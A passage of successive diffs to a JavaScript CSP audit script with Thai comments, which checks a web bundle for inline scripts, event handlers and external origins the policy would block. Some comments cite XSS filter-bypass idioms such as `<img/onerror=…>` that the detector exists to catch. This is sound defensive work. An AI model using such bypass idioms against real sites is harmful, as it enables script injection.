+        if (!URL_ATTRIBUTES.has(name)) continue;
+        // srcset เป็นรายการคั่นด้วย comma และมี descriptor ต่อท้ายแต่ละตัว
+        for (const candidate of value.split(',')) countIfProtocolRelative(candidate.trim().split(/\s+/)[0] ?? '');
+      }
     }
     for (const [origin, count] of originCounts) {
       add(

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -126,8 +126,8 @@ function policyOrigins(sources) {
  *
  * มีไว้เพราะการเทียบกับ allowlist รวมทุก directive ทำให้ origin ที่ policy อนุญาตไว้เพื่อ
  * **โหลดฟอนต์** กลายเป็นใบผ่านให้ **โหลดสคริปต์** — `<script src="//fonts.gstatic.com/x.js">`
- * เคยผ่านฉลุยทั้งที่ `script-src 'self'` บล็อกจริง (review ฐ) · เป็นความผิดพลาดเดียวกับ
- * review C1 ของรอบที่สอง ซึ่งตอนนั้นแก้เฉพาะเส้นทาง `fetch()` ส่วนเส้นทาง attribute ยังค้าง
+ * เคยผ่านฉลุยทั้งที่ `script-src 'self'` บล็อกจริง · เป็นความผิดพลาดเดียวกับที่เคยแก้ให้
+ * เส้นทาง `fetch()` ไปแล้ว (ดู `CONNECT_CALL_PATTERNS`) ส่วนเส้นทาง attribute ค้างอยู่นานกว่า
  *
  * **ใส่เฉพาะคู่ที่ไม่กำกวม** — `<source src>` เป็น `img-src` เมื่ออยู่ใน `<picture>` แต่เป็น
  * `media-src` เมื่ออยู่ใน `<video>` ซึ่ง static analysis แยกไม่ได้ จึงไม่อยู่ในตารางนี้และตกไป
@@ -180,6 +180,23 @@ function originsForDirective(policy, directive) {
 }
 
 /**
+ * source list ของ directive เป็นข้อความสำหรับ finding — fallback ไป `default-src` เหมือน
+ * `originsForDirective()` เพื่อให้ข้อความตรงกับชุดที่ใช้ตัดสินจริง ไม่ใช่คนละชุดกัน
+ */
+function sourcesText(policy, directive) {
+  return (policy.get(directive) ?? policy.get('default-src') ?? []).join(' ') || 'ไม่ได้ประกาศ';
+}
+
+/**
+ * URL ของแต่ละรายการในค่าที่อาจเป็น `srcset` — คั่นด้วย comma และมี descriptor (`2x`, `640w`)
+ * ต่อท้ายได้ · ค่าที่ไม่ใช่ srcset ผ่านฟังก์ชันนี้ได้เหมือนกัน เพราะจะได้ลิสต์ตัวเดียว
+ * (เดิมตรรกะนี้ถูกคัดลอกไว้สองที่พร้อมคอมเมนต์คำต่อคำเดียวกัน)
+ */
+function srcsetUrls(value) {
+  return value.split(',').map((entry) => entry.trim().split(/\s+/)[0] ?? '');
+}
+
+/**
  * origin ที่ policy อนุญาต **รวมทุก directive** — ใช้ได้เฉพาะกับ URL ที่บอกบริบทไม่ได้
  * (สตริงลอย ๆ ใน bundle ที่ static analysis ไม่รู้ว่าจะถูกใช้โหลดอะไร)
  *
@@ -197,10 +214,23 @@ function allowedOriginsFrom(policy) {
 }
 
 /**
- * directive ที่ควบคุมการโหลด subresource — ใช้บอกผู้อ่านว่า finding เทียบกับอะไรจริง ๆ
- * คำนวณจาก policy ที่ parse มา ไม่ใช่รายการที่พิมพ์ค้างไว้ ซึ่งเคยตกหล่น `style-src`
+ * directive ที่ผลักดัน origin เข้า allowlist รวม — ใช้บอกผู้อ่านว่า finding เทียบกับอะไรจริง ๆ
+ *
+ * **คำนวณจาก policy ที่ parse มา ไม่ใช่รายการที่พิมพ์ค้างไว้** — รายการที่พิมพ์ค้างเคยตกหล่น
+ * `style-src` (review C3) แล้วตกหล่นซ้ำรอบที่สอง (`frame-src` · `object-src` · `form-action`
+ * ที่ `TAG_ATTRIBUTE_DIRECTIVES` เพิ่มเข้ามาแต่ไม่มีใครเติมในรายการ) · คลาสเดียวกับที่ไล่ปิด
+ * มาทั้ง PR: กฎที่เก็บสำเนาความรู้ไว้เองย่อมเพี้ยนจากแหล่งจริง จึงอ่านจาก `policy` ตรง ๆ
+ *
+ * นับเฉพาะ directive ที่ประกาศ **origin ภายนอกจริง** เพราะนั่นคือสิ่งเดียวที่ทำให้
+ * `allowedOriginsFrom()` ยอมให้ origin ผ่าน — `connect-src 'self'` ไม่ได้ยืม origin ให้ใคร
  */
-const FETCH_DIRECTIVES = ['connect-src', 'img-src', 'font-src', 'style-src', 'script-src', 'media-src'];
+function directivesWithOrigins(policy) {
+  const names = [];
+  for (const [directive, sources] of policy) {
+    if (policyOrigins(sources).size > 0) names.push(directive);
+  }
+  return names;
+}
 
 /**
  * รูปแบบการเรียกที่ทำให้เกิด request ใต้ `connect-src` — capture group 1 คือ URL
@@ -305,7 +335,7 @@ const stripTrailingPunctuation = (url) => url.replace(/[.,;:{}!?'"]+$/, '');
  * **ไม่มีอักขระตัวไหนถูกใช้เป็น "ตัวปิด URL" อีกต่อไป** — สามรอบติดที่ผ่านมาพิสูจน์ว่าทุกตัว
  * ที่เคยเลือกมาเป็นตัวคั่น (`_` → `@` → `, ; ( { }` → `)`) ล้วน**อยู่ในส่วน userinfo ได้
  * ตามมาตรฐาน URL** และ host จริงถูกตัดสินด้วย `@` ตัวสุดท้าย ผลคือ origin ที่ policy อนุญาต
- * ถูกยืมมาเป็นคำนำหน้าแล้วผ่านฉลุยทุกครั้ง (review ฉ · ซ · ฑ — คำอธิบายเดียวกันสามรอบ)
+ * ถูกยืมมาเป็นคำนำหน้าแล้วผ่านฉลุยทุกครั้ง — อาการเดียวกันซ้ำสามรอบ ต่างแค่อักขระที่เลือก
  *
  * เหตุผลเดิมที่ต้องมีตัวคั่นคือ `url(a),url(b)` ต้องแยกเป็นสอง origin ไม่ใช่ก้อนเดียว
  * วิธีนี้ได้ผลเดียวกันโดยไม่ต้องเดา: **b มีจุดเริ่มของตัวเอง** จึงถูก parse แยกอยู่แล้ว
@@ -329,8 +359,8 @@ const OPEN_TAG_SCAN_LIMIT = 4096;
  * ไม่ปิดแท็ก (`<img alt="a>b" onclick="…">` เป็นแท็กเดียว ซึ่งคือสิ่งที่ browser อ่านจริง)
  *
  * ของเดิมใช้ `/<[a-zA-Z][^>]*>/` ที่ตัดตรง `>` ตัวแรกเสมอ แล้วชดเชยด้วย guard นับ quote
- * ให้ครบคู่ · กฎ URL เลิกพึ่งขอบเขตแท็กไปแล้วในรอบที่สี่ แต่กฎ handler ยังพึ่งอยู่ จึงเหลือ
- * เป็นช่องสุดท้ายของคลาสเดียวกัน — วิธีที่ปิดได้จริงคือแตกแท็กให้ถูกตั้งแต่แรก
+ * ให้ครบคู่ · กฎ URL เลิกพึ่งขอบเขตแท็กไปก่อน ส่วนกฎ handler ยังพึ่งอยู่ จึงเหลือเป็นช่อง
+ * สุดท้ายของคลาสเดียวกัน — วิธีที่ปิดได้จริงคือแตกแท็กให้ถูกตั้งแต่แรก
  *
  * `terminated: false` แปลว่า **แยก attribute ไม่ได้จริง** (ไม่เจอ `>` นอก quote ก่อนชน `<`
  * ตัวถัดไปหรือชนลิมิต) ผู้เรียกต้องไม่เชื่อ `attrs` ในกรณีนั้น ซึ่งตรงกับ browser ด้วย:
@@ -438,7 +468,7 @@ function walk(dir) {
 // ── กฎแต่ละข้อเป็นฟังก์ชันบริสุทธิ์ ─────────────────────────────────────────────
 // คืน finding ที่ยัง **ไม่มีชื่อไฟล์** ให้ผู้เรียกเติม — แยกออกมาเพราะตอนรวมอยู่ในลูปเดียว
 // ยาว 167 บรรทัด ทิศทางของ `continue` แต่ละตัวตรวจด้วยตาไม่ไหว จน guard ที่เพิ่มเข้าไป
-// เพื่อปิดช่องหนึ่งกลับเปิดอีกช่องโดยไม่มีใครเห็น (code review รอบที่สี่)
+// เพื่อปิดช่องหนึ่งกลับเปิดอีกช่องโดยไม่มีใครเห็น
 
 /**
  * R1 — inline `<script>` ที่มีเนื้อหา และ inline event handler ที่เป็น attribute ในแท็ก
@@ -484,7 +514,7 @@ function inlineScriptFindings(content) {
     if (!tag.terminated) continue;
     // แตก attribute ด้วยตัวเดียวกับที่ branch <script> ใช้ แทนการยิง regex ดิบทับ attrs
     // ของเดิมบังคับ whitespace นำหน้า (`/\son[a-z]+/`) ซึ่ง HTML ไม่ได้บังคับ — `<img/onerror=…>`
-    // และ `<a href="x"onclick=…>` จึงหลุดทั้งคู่ ทั้งที่เป็นสำนวน bypass ที่ใช้กันจริง (review ฌ)
+    // และ `<a href="x"onclick=…>` จึงหลุดทั้งคู่ ทั้งที่เป็นสำนวน bypass ตัวกรอง XSS ที่ใช้กันจริง
     for (const name of parseAttributes(tag.attrs).keys()) {
       if (!EVENT_HANDLER_ATTRIBUTES.has(name)) continue;
       found.push({ rule: 'inline-event-handler', directive: 'script-src', detail: `พบ inline event handler: ${name}= ใน ${`<${tag.name}${tag.attrs}`.slice(0, 40)}` });
@@ -528,6 +558,10 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
   const found = [];
   const reported = new Set(); // origin ที่ฟ้องไปแล้ว — กันฟ้องซ้ำจากกฎอื่นในไฟล์เดียวกัน
 
+  // เงื่อนไข "ไม่ต้องฟ้อง" เดิมถูกคัดลอกไว้สามที่ ซึ่งเพี้ยนออกจากกันได้เงียบ ๆ เมื่อมีคนแก้ที่เดียว
+  const isCovered = (origin, allowed) =>
+    allowed.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin);
+
   // แท็กที่บอก directive ได้แน่นอน ตรวจก่อนกฎอื่น เพราะให้คำตอบที่แม่นกว่า:
   // เทียบกับ directive ที่บล็อกจริง ไม่ใช่ allowlist รวมที่ยืม origin ข้าม directive ได้
   for (const tag of openTags(content)) {
@@ -537,16 +571,15 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
       const directive = directiveFor(tag.name, attr, attrs);
       if (directive === null) continue;
       const allowed = originsForDirective(policy, directive);
-      // srcset เป็นรายการคั่นด้วย comma และมี descriptor ต่อท้ายแต่ละตัว
-      for (const entry of value.split(',')) {
-        const origin = originOf(entry.trim().split(/\s+/)[0] ?? '');
+      for (const url of srcsetUrls(value)) {
+        const origin = originOf(url);
         if (origin === null) continue; // relative/data: — อยู่ใต้ 'self' หรือไม่ใช่ URL
-        if (allowed.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
+        if (isCovered(origin, allowed)) continue;
         reported.add(origin);
         found.push({
           rule: 'external-origin',
           directive,
-          detail: `<${tag.name} ${attr}> โหลดจาก ${origin} แต่ ${directive} อนุญาตแค่ ${(policy.get(directive) ?? policy.get('default-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'} — จะถูกบล็อกหลัง enforce`,
+          detail: `<${tag.name} ${attr}> โหลดจาก ${origin} แต่ ${directive} อนุญาตแค่ ${sourcesText(policy, directive)} — จะถูกบล็อกหลัง enforce`,
         });
       }
     }
@@ -556,19 +589,19 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
     for (const match of content.matchAll(pattern)) {
       const origin = originOf(match[1]); // null = path สัมพัทธ์ ซึ่งอยู่ใต้ 'self' อยู่แล้ว
       if (origin === null) continue;
-      if (connectOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
+      if (isCovered(origin, connectOrigins)) continue;
       reported.add(origin);
       found.push({
         rule: 'external-origin',
         directive: 'connect-src',
-        detail: `พบการเรียกข้อมูลไป ${origin} แต่ connect-src อนุญาตแค่ ${(policy.get('connect-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'} — จะถูกบล็อกหลัง enforce`,
+        detail: `พบการเรียกข้อมูลไป ${origin} แต่ connect-src อนุญาตแค่ ${sourcesText(policy, 'connect-src')} — จะถูกบล็อกหลัง enforce`,
       });
     }
   }
 
   const originCounts = new Map();
   const countOrigin = (origin) => {
-    if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) return;
+    if (isCovered(origin, allowedOrigins)) return;
     originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
   };
   // ให้ URL parser เป็นคนบอกว่า host คืออะไร ไม่ใช่ character class (ดู absoluteUrlCandidates)
@@ -593,9 +626,8 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
   // ชัดกว่า url() ด้วยซ้ำ · จับที่คู่ชื่อ-ค่า ไม่พึ่งขอบเขตแท็ก (ดู URL_ATTRIBUTE_ASSIGNMENT)
   for (const match of content.matchAll(URL_ATTRIBUTE_ASSIGNMENT)) {
     const value = match[1] ?? match[2] ?? match[3] ?? '';
-    // srcset เป็นรายการคั่นด้วย comma และมี descriptor ต่อท้ายแต่ละตัว · ชิ้นส่วน base64
-    // ของ data URI ที่ถูกแตกมาด้วยจะตกไปเองเพราะไม่ได้ขึ้นต้นด้วย `//`
-    for (const entry of value.split(',')) countIfProtocolRelative(entry.trim().split(/\s+/)[0] ?? '');
+    // ชิ้นส่วน base64 ของ data URI ที่ถูก srcsetUrls แตกมาด้วยจะตกไปเอง เพราะไม่ขึ้นต้นด้วย `//`
+    for (const url of srcsetUrls(value)) countIfProtocolRelative(url);
   }
 
   for (const [origin, count] of originCounts) {
@@ -629,9 +661,14 @@ function auditBundle(distDir, cspValue) {
   const policy = parseCspPolicy(cspValue);
   const allowedOrigins = allowedOriginsFrom(policy);
   // allowlist แยกสำหรับ URL ที่รู้บริบทแล้วว่าเป็น request — ต้องผ่าน connect-src เท่านั้น
-  const connectOrigins = policyOrigins(policy.get('connect-src'));
+  //
+  // ใช้ `originsForDirective` เพื่อให้ **fallback ไป `default-src` เหมือนที่ browser ทำ** —
+  // ของเดิมอ่าน `policy.get('connect-src')` ตรง ๆ ซึ่งเมื่อ policy ไม่ได้ประกาศ connect-src
+  // จะได้เซ็ตว่างแล้วฟ้อง fetch ทุกปลายทางทั้งที่ `default-src` อนุญาตไว้ = false positive
+  // (กฎ attribute ข้าง ๆ fallback ถูกอยู่แล้ว ความไม่สอดคล้องนี้จึงซ่อนอยู่จนมาเทียบกัน)
+  const connectOrigins = originsForDirective(policy, 'connect-src');
   // directive ที่รายงานต้องสะท้อน policy จริง แก้ policy แล้วข้อความตามเอง
-  const consultedDirectives = FETCH_DIRECTIVES.filter((d) => policy.has(d)).join(' / ') || 'default-src';
+  const consultedDirectives = directivesWithOrigins(policy).join(' / ') || 'default-src';
   // สี่ค่านี้เดินทางด้วยกันเสมอในกฎ R3/R4 จึงมัดเป็นก้อนเดียว แทนที่จะส่งทีละตัว
   const originContext = { policy, connectOrigins, allowedOrigins, consultedDirectives };
   const allowsInlineScript = hasSource(policy, 'script-src', "'unsafe-inline'");
@@ -670,10 +707,10 @@ function auditBundle(distDir, cspValue) {
     const content = readFileSync(file, 'utf8');
 
     // กฎแต่ละข้ออยู่ในฟังก์ชันของตัวเอง (ดูด้านบน) — ที่นี่เหลือแค่ประกอบผลเข้ากับชื่อไฟล์
-    const push = (list) => { for (const f of list) add(file, f.rule, f.directive, f.detail); };
-    if (!allowsInlineScript) push(inlineScriptFindings(content));
-    if (!allowsDynamicCode) push(dynamicCodeFindings(content));
-    push(externalOriginFindings(content, originContext));
+    const recordAll = (list) => { for (const f of list) add(file, f.rule, f.directive, f.detail); };
+    if (!allowsInlineScript) recordAll(inlineScriptFindings(content));
+    if (!allowsDynamicCode) recordAll(dynamicCodeFindings(content));
+    recordAll(externalOriginFindings(content, originContext));
   }
 
   return { findings, inspected, skipped, scanned: files.length };

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -172,19 +172,40 @@ function directiveFor(tagName, attr, attrs) {
 }
 
 /**
- * origin ที่ directive หนึ่งอนุญาต โดยเคารพ fallback ไป `default-src` ตามที่ browser ทำ
- * ไม่ประกาศทั้งคู่ = ไม่อนุญาต origin ภายนอกเลย (fail-closed)
+ * source list ที่ browser ใช้ตัดสิน directive หนึ่ง — **จุดเดียว** ที่เดินกฎ fallback
+ *
+ * ประกาศไว้ = ใช้ลิสต์ของตัวเอง (`declared: true`) · ไม่ประกาศและเป็น non-fetch =
+ * `declared: false` เพราะ `default-src` เป็น fallback ของ **fetch directive เท่านั้น** ตาม
+ * spec — `form-action` ที่ไม่ได้ประกาศแปลว่า "ไม่จำกัดปลายทางการ submit" ไม่ใช่
+ * "จำกัดเท่า default-src" ของเดิม fallback ให้ทุก directive จึงฟ้อง `<form action>` ที่
+ * browser ปล่อยผ่าน · ไม่ประกาศและเป็น fetch directive = fallback ไป `default-src` เหมือน browser
+ *
+ * ทั้งตัวตัดสิน (`originsForDirective`) และตัวรายงาน (`sourcesText`) เรียกผ่านตัวนี้เท่านั้น —
+ * กฎ fallback ที่คัดลอกไว้สองที่เพี้ยนออกจากกันได้เงียบ ๆ เมื่อมีคนแก้ที่เดียว
  */
-function originsForDirective(policy, directive) {
-  return policyOrigins(policy.get(directive) ?? policy.get('default-src'));
+function resolveDirectiveSources(policy, directive) {
+  if (policy.has(directive)) return { sources: policy.get(directive), declared: true };
+  if (NON_FETCH_DIRECTIVES.has(directive)) return { sources: [], declared: false };
+  return { sources: policy.get('default-src') ?? [], declared: true };
 }
 
 /**
- * source list ของ directive เป็นข้อความสำหรับ finding — fallback ไป `default-src` เหมือน
- * `originsForDirective()` เพื่อให้ข้อความตรงกับชุดที่ใช้ตัดสินจริง ไม่ใช่คนละชุดกัน
+ * origin ที่ directive หนึ่งอนุญาต โดยเคารพ fallback ตาม `resolveDirectiveSources()`
+ * ไม่ประกาศทั้งคู่ = ไม่อนุญาต origin ภายนอกเลย (fail-closed)
+ *
+ * คืน **`null` = ไม่มีข้อจำกัด** (กรณี `declared: false` ด้านบน)
  */
+function originsForDirective(policy, directive) {
+  const { sources, declared } = resolveDirectiveSources(policy, directive);
+  if (!declared) return null;
+  return policyOrigins(sources);
+}
+
+/** source list ของ directive เป็นข้อความสำหรับ finding — ตรงกับชุดที่ใช้ตัดสินจริงเสมอ */
 function sourcesText(policy, directive) {
-  return (policy.get(directive) ?? policy.get('default-src') ?? []).join(' ') || 'ไม่ได้ประกาศ';
+  const { sources, declared } = resolveDirectiveSources(policy, directive);
+  if (!declared) return 'ไม่ได้ประกาศ (จึงไม่จำกัดตาม spec)';
+  return sources.join(' ') || 'ไม่ได้ประกาศ';
 }
 
 /**
@@ -193,21 +214,61 @@ function sourcesText(policy, directive) {
  * (เดิมตรรกะนี้ถูกคัดลอกไว้สองที่พร้อมคอมเมนต์คำต่อคำเดียวกัน)
  */
 function srcsetUrls(value) {
-  return value.split(',').map((entry) => entry.trim().split(/\s+/)[0] ?? '');
+  // `split()` คืนอย่างน้อยหนึ่งสมาชิกเสมอ (สตริงว่างได้ `['']`) จึงไม่ต้องมี fallback ต่อท้าย
+  return value.split(',').map((entry) => entry.trim().split(/\s+/)[0]);
 }
 
 /**
- * origin ที่ policy อนุญาต **รวมทุก directive** — ใช้ได้เฉพาะกับ URL ที่บอกบริบทไม่ได้
+ * directive ที่ **ไม่ได้คุมการโหลด resource** — ประกาศ origin ไว้ที่นี่ไม่ได้แปลว่า bundle
+ * โหลดจากที่นั่นได้ จึงต้องไม่ยืม origin ให้ `allowedOriginsFrom()`
+ *
+ * ทำเป็น **blocklist ชุดปิดตาม spec** ไม่ใช่ allowlist รายชื่อ fetch directive เพราะฝั่ง
+ * fetch งอกใหม่ได้ (`prefetch-src`, `script-src-elem`, …) แล้วรายการที่พิมพ์ค้างไว้จะตกหล่น
+ * เงียบ ๆ — บทเรียนเดียวกับที่เพิ่งแก้ `directivesWithOrigins()` ให้อ่านจาก policy ตรง ๆ
+ * ส่วนฝั่ง non-fetch ปิดเท่าที่ spec ปัจจุบันมี (กลุ่มนี้ไม่ค่อยมี directive ใหม่) และการตกหล่นที่นี่
+ * ทำให้ gate **ฟ้องเกิน** (เห็นได้ทันที) ไม่ใช่ **เงียบ** (ไม่มีใครเห็น)
+ *
+ * **ห้ามเติมโดยไม่เขียนเหตุผล** — มีเทสบังคับเหมือน NON_FETCHED_ORIGINS
+ */
+const NON_FETCH_DIRECTIVES = new Map([
+  ['base-uri', 'คุมค่าที่ <base href> ตั้งได้ ไม่ได้ทำให้เกิด request ไปยัง origin นั้น'],
+  ['form-action', 'คุมปลายทางที่ฟอร์ม submit ไป — เส้นทางนี้ตรวจตรงผ่าน TAG_ATTRIBUTE_DIRECTIVES อยู่แล้ว'],
+  ['frame-ancestors', 'คุมว่าใคร embed *เรา* ได้ ไม่ใช่ว่าเราโหลดอะไรจากที่นั่นได้'],
+  ['navigate-to', 'คุมปลายทางของการ navigate (ร่างเดิมของ spec) ซึ่งไม่ใช่การโหลด subresource'],
+  ['report-to', 'ชื่อ reporting group ไม่ใช่ source list ของ origin'],
+  ['report-uri', 'ปลายทางรายงาน — browser ส่งเอง ไม่ผ่าน fetch directive ใด'],
+  ['sandbox', 'ค่าเป็น token ของ sandbox flag ไม่ใช่ origin'],
+  ['referrer', 'ค่าเป็นนโยบาย referrer (no-referrer ฯลฯ) ไม่ใช่ origin — เลิกใช้แล้วแต่ยังเจอใน policy เก่า'],
+  ['plugin-types', 'ค่าเป็น MIME type ที่อนุญาตให้ปลั๊กอินโหลด ไม่ใช่ origin — เลิกใช้แล้ว'],
+  ['webrtc', "ค่าเป็น 'allow'/'block' คุมการเปิด RTCPeerConnection ไม่ใช่ origin"],
+  ['reflected-xss', "ค่าเป็น 'allow'/'filter'/'block' สั่ง XSS auditor ไม่ใช่ origin — เลิกใช้แล้วแต่ยังเจอใน policy เก่า"],
+  ['require-sri-for', 'ค่าเป็นชนิด resource ที่บังคับ SRI (script/style) ไม่ใช่ origin'],
+  ['require-trusted-types-for', 'ค่าเป็น sink group ไม่ใช่ origin'],
+  ['trusted-types', 'ค่าเป็นชื่อ policy ของ Trusted Types ไม่ใช่ origin'],
+  ['upgrade-insecure-requests', 'ไม่มีค่า เป็นสวิตช์ล้วน'],
+  ['block-all-mixed-content', 'ไม่มีค่า เป็นสวิตช์ล้วน (เลิกใช้แล้วแต่ยังเจอใน policy เก่า)'],
+]);
+
+/** เฉพาะ directive ที่คุมการโหลด resource จริง — คู่ [directive, sources] ตามลำดับใน policy */
+function fetchDirectiveEntries(policy) {
+  return [...policy].filter(([directive]) => !NON_FETCH_DIRECTIVES.has(directive));
+}
+
+/**
+ * origin ที่ policy อนุญาต **รวมทุก fetch directive** — ใช้ได้เฉพาะกับ URL ที่บอกบริบทไม่ได้
  * (สตริงลอย ๆ ใน bundle ที่ static analysis ไม่รู้ว่าจะถูกใช้โหลดอะไร)
  *
  * **ห้ามใช้กับ URL ที่รู้บริบทแล้ว** — origin ที่ policy อนุญาตไว้เพื่อโหลดฟอนต์จะกลายเป็น
  * ใบผ่านให้ยิง API ทั้งที่ `connect-src` ไม่ได้อนุญาต ซึ่งคือความเสี่ยงข้อ 1 ในเอกสาร
  * (`VITE_API_URL` แบบ absolute) ที่ gate นี้มีไว้จับโดยตรง — review C1 พิสูจน์ว่า
  * `fetch("https://fonts.gstatic.com/…")` เคยผ่านฉลุยเพราะ gstatic อยู่ใน `font-src`
+ *
+ * รอบที่ 9 (M2) ปิดอีกรูของคลาสเดียวกัน: ของเดิมวน `policy.values()` ทุก directive จึงยืม
+ * origin จาก `frame-ancestors` / `form-action` / `base-uri` ซึ่งไม่ได้อนุญาตให้โหลดอะไรเลย
  */
 function allowedOriginsFrom(policy) {
   const origins = new Set();
-  for (const sources of policy.values()) {
+  for (const [, sources] of fetchDirectiveEntries(policy)) {
     for (const origin of policyOrigins(sources)) origins.add(origin);
   }
   return origins;
@@ -226,7 +287,7 @@ function allowedOriginsFrom(policy) {
  */
 function directivesWithOrigins(policy) {
   const names = [];
-  for (const [directive, sources] of policy) {
+  for (const [directive, sources] of fetchDirectiveEntries(policy)) {
     if (policyOrigins(sources).size > 0) names.push(directive);
   }
   return names;
@@ -557,10 +618,24 @@ function dynamicCodeFindings(content) {
 function externalOriginFindings(content, { policy, connectOrigins, allowedOrigins, consultedDirectives }) {
   const found = [];
   const reported = new Set(); // origin ที่ฟ้องไปแล้ว — กันฟ้องซ้ำจากกฎอื่นในไฟล์เดียวกัน
+  // origin ที่กฎซึ่ง **รู้บริบท** ตัดสินแล้วว่า directive ที่คุมมันอนุญาตไว้จริง
+  //
+  // จำเป็นตั้งแต่ M2 ถอด directive ที่ไม่ใช่ fetch ออกจาก allowlist รวม: `<form action>`
+  // ที่ `form-action` อนุญาตไว้ผ่านเส้นทางที่รู้บริบทแล้ว แต่กฎสตริงลอยซึ่งมองไม่เห็นบริบท
+  // จะฟ้องมันซ้ำ = false positive ที่เกิดจากการปิด false negative · "ผ่านแล้ว" ต้องเดินทาง
+  // ต่อได้เหมือน "ฟ้องแล้ว" ไม่ใช่หายไปเฉย ๆ
+  //
+  // **ข้อแลกเปลี่ยนที่รู้ตัว**: เคลียร์ทั้ง origin ไม่ใช่ทีละ URL — สตริงอื่นของ origin เดียวกัน
+  // ในไฟล์นั้นจึงเงียบตาม · ยอมได้เพราะกฎสตริงลอยเป็น heuristic ("ถ้าโค้ดโหลดจากที่นี่จริง")
+  // และ URL ที่บริบทบอก directive ได้ยังถูกตรวจกับ directive ของมันเองทีละตัวอยู่แล้ว
+  const cleared = new Set();
 
-  // เงื่อนไข "ไม่ต้องฟ้อง" เดิมถูกคัดลอกไว้สามที่ ซึ่งเพี้ยนออกจากกันได้เงียบ ๆ เมื่อมีคนแก้ที่เดียว
-  const isCovered = (origin, allowed) =>
-    allowed.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin);
+  // สถานะ "จัดการไปแล้วในไฟล์นี้" — คนละคำถามกับ "policy อนุญาตไหม" ซึ่งต้องเทียบกับชุด
+  // ของ directive ที่บล็อกจริงทีละเส้นทาง · ของเดิมรวมสองคำถามไว้ใน isCovered(origin,
+  // allowed) ทำให้เทอม `allowed.has()` ตายตั้งแต่รอบที่ 11 — เส้นทางที่มันจะเป็นจริงถูก
+  // `continue` ไปก่อนหน้าหมดแล้ว แต่ตัวเทอมยังตามมาอยู่ใน helper จนรีวิวรอบที่ 12 ไล่
+  // reachability เจอ ("แก้แล้ว" ต้องพิสูจน์ ไม่ใช่ประกาศ)
+  const alreadyHandled = (origin) => NON_FETCHED_ORIGINS.has(origin) || reported.has(origin);
 
   // แท็กที่บอก directive ได้แน่นอน ตรวจก่อนกฎอื่น เพราะให้คำตอบที่แม่นกว่า:
   // เทียบกับ directive ที่บล็อกจริง ไม่ใช่ allowlist รวมที่ยืม origin ข้าม directive ได้
@@ -574,7 +649,12 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
       for (const url of srcsetUrls(value)) {
         const origin = originOf(url);
         if (origin === null) continue; // relative/data: — อยู่ใต้ 'self' หรือไม่ใช่ URL
-        if (isCovered(origin, allowed)) continue;
+        if (alreadyHandled(origin)) continue; // ฟ้องไปแล้ว / ข้อยกเว้นที่บันทึกเหตุผลไว้
+        // `allowed === null` = directive นั้นไม่ได้ประกาศและไม่มี fallback ตาม spec = ไม่จำกัด
+        if (allowed === null || allowed.has(origin)) {
+          cleared.add(origin);
+          continue;
+        }
         reported.add(origin);
         found.push({
           rule: 'external-origin',
@@ -589,7 +669,9 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
     for (const match of content.matchAll(pattern)) {
       const origin = originOf(match[1]); // null = path สัมพัทธ์ ซึ่งอยู่ใต้ 'self' อยู่แล้ว
       if (origin === null) continue;
-      if (isCovered(origin, connectOrigins)) continue;
+      // กฎ fetch ตัดสินด้วยชุดของตัวเองเท่านั้น — ไม่สน `cleared` เพราะหลักฐานบริบทของ
+      // directive อื่นไม่ใช่หลักฐานให้ connect-src · ฟ้องไปแล้ว/ข้อยกเว้นยังต้องตัดซ้ำ
+      if (alreadyHandled(origin) || connectOrigins.has(origin)) continue;
       reported.add(origin);
       found.push({
         rule: 'external-origin',
@@ -601,7 +683,7 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
 
   const originCounts = new Map();
   const countOrigin = (origin) => {
-    if (isCovered(origin, allowedOrigins)) return;
+    if (cleared.has(origin) || alreadyHandled(origin) || allowedOrigins.has(origin)) return;
     originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
   };
   // ให้ URL parser เป็นคนบอกว่า host คืออะไร ไม่ใช่ character class (ดู absoluteUrlCandidates)
@@ -774,7 +856,14 @@ function main() {
 // EVENT_HANDLER_ATTRIBUTES ถูก export เพื่อให้ differential test เทียบชุดเดียวกับที่กฎใช้จริง
 // ไม่ใช่สำเนาที่เพี้ยนออกจากกันได้ — เทสนั้นถาม parse5 ว่า markup มี attribute อะไรบ้าง
 // แล้วคาดหวังให้ gate ฟ้องเฉพาะตัวที่อยู่ในชุดนี้
-export { auditBundle, parseCspPolicy, allowedOriginsFrom, NON_FETCHED_ORIGINS, EVENT_HANDLER_ATTRIBUTES };
+export {
+  auditBundle,
+  parseCspPolicy,
+  allowedOriginsFrom,
+  NON_FETCHED_ORIGINS,
+  NON_FETCH_DIRECTIVES,
+  EVENT_HANDLER_ATTRIBUTES,
+};
 
 if (process.argv[1] && import.meta.url === pathToFileURL(process.argv[1]).href) {
   try {

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -162,10 +162,23 @@ const CONNECT_CALL_PATTERNS = [
 const URL_FUNCTION_ARG = /url\(\s*["']?([^"')]+)/gi;
 
 /**
- * attribute ที่ค่าเป็น URL ซึ่ง browser โหลดจริง จึงอยู่ใต้ directive ของ CSP
- * `srcset` แยกด้วย comma และมี descriptor ต่อท้าย จึงถูกแตกก่อนเทียบ
+ * การกำหนดค่าให้ attribute (หรือ property) ที่เป็น URL ซึ่ง browser โหลดจริง
+ *
+ * จับที่ **คู่ชื่อ-ค่า** ไม่ใช่ขอบเขตของแท็ก เพราะ regex ที่อ่านแท็กขาดกลางคันทันทีที่มี `>`
